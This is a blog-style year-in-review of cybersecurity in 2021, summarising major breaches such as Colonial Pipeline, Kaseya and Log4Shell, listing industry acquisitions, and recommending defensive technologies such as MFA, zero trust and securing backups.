Cybersecurity Rewind 2021
Same as 2020, this year had a lot of major events that reshaped the way of thinking about cybersecurity.
Let's look at some of the most important aspects and go over what happened in the technology space, new alliances, and especially what mess the cybercriminals created this year.
A Quick Recap Of The 2021 Cyberattacks and Breaches
- Twitch: In October 2021, 125GB of data was posted online from Twitch with 6000 internal repositories, SDKs, and red teaming tools.
- LinkedIn: In April 2021, 500 million profiles were leaked including the users’ personal information.
- Colonial Pipeline: In May 2021, Colonial Pipeline, the largest pipeline company in the US had to take its operations down due to a Ransomware attack.
- Kaseya: In July 2021, REvil Ransomware Gand exploited a zero-day vulnerability on the Kaseya VSA solution (CVE-2021–30116) to gain admin access, and use it as a gateway to launch ransomware attacks on Kaseya’s customers. REvil asked for a $70M ransom and affected tens of thousands of customers.
- NSO: In July 2021, a new report published by Amnesty International described how the Pegasus spyware is deployed, how it operates, and some of the high-profile cases subject to espionage.
- Microsoft: In March 2021, A Microsoft Exchange vulnerability led to multiple data breaches for at least 30,000 companies.
- Log4J: On November 24th, 2021, Alibaba’s Cloud Security Team had privately disclosed Log4Shell or CVE-2021–44228 zero-day vulnerability to the Apache Software Foundation, then was made public on December 9th, 2021. This vulnerability can be explained simply as indecision to differentiate between data and executable commands that allow attackers to run their malicious code.
Some Of The Key Cybersecurity Alliances
Here are some of the recent security mergers and acquisitions.
- Zscaler acquired Smokescreen Technologies for active defense and deception technologies.
- Splunk acquired TruSTAR, the threat intelligence exchange company.
- Tenable acquiring Alsid Limited for quantum encryption.
- Cisco acquired Kenna Security for risk intelligence and vulnerability management.
- Forcepoint acquiring Cyberinc for remote browser isolation.
- Deloitte acquired aeCyber solution to help with cyber resilience, regulatory, and compliance.
- Imperva acquired CloudVector for advanced API security.
Most Important Technologies To Focus On
I would say that the technology to highlight is “Multi-factor Authentication”, yes it’s still on the top list of recommendations, and yes it can be bypassed sometimes, but like we said, “Done is better than perfect”. However, not only because of last year or since the pandemic started, but the controls/technologies below were neglected for ages, and now they came back to the surface.
- Insider Threat Management: by far one of the hardest risks to deal with as an organization is to protect sensitive information from insiders as they’re already in and are trusted. However, It’s still a challenge, but a lot of technologies help prevent insiders breaches, the detection is still tricky where security is not mature enough, but this area needs definitely more attention.
- Data Governance: organizations’ growth and adoption of digital technologies are exponentially increasing the volume of data to be stored, backed up, managed, protected, and destroyed. For that, it’s crucial to manage and protect the data through its lifecycle, from creation to destruction, from classification, to access control, backup, and destruction.
- AI and Deep Learning: for automating detection, response, and processing of natural language.
- Active Defense: Where security teams use offensive tactics to slow down or stop hackers to make cyber attacks more difficult to undertake. This also uses deception technologies.
- Deception: Distract attacks from the company’s valuable assets and redirect them to a trap.
- Behavioral Analysis: New threats are discovered every day and zero-days are a reality, this makes traditional security not effective and slow at detecting non-authorized actions and malicious behaviors. That’s why it’s important to establish baselines for users and machines to identify the drift and detect anomalies.
- Securing Backups: Ransomware attacks are the new normal, and are also targeting backups to reduce the chances that the victims can recover their data and not pay the ransom. This made securing backups a must, not only with security controls like encryption and isolations but also with processes.
- Zero Trust: A lot of companies are still struggling with segmentation and having both external and internal networks at an acceptable level of security. Assuming that the network is compromised and not trusting anything while enforcing controls, policies, automation, and monitoring is the key.
- Mobile Security: Mobile devices are the most devices these days and for sure contain more sensitive data than before. That’s why it getting greater attention this year and this is making the mobile security market booming offering software and hardware to keep these previous pieces of glass secure.
- 3rd Party Risk: Protecting your company from the unknown is frustrating, especially when a breach is caused by a lack of security on your trusted MSP side. That’s why having the right policies and technologies in place to vet 3rd parties but also to monitor any abnormal activities is a must to diminish this inherent risk.
I hope that you’ve enjoyed reading this short format aimed to help get a quick snapshot of what happened this year in the cyberspace.
Check out my latest video about Risk Management, If you’re interested in starting a career in Cybersecurity, watch this one, and don’t forget to subscribe to my channel and leave a comment if there are any topics you’re interested in seeing on my next videos.
Check my other stuff here.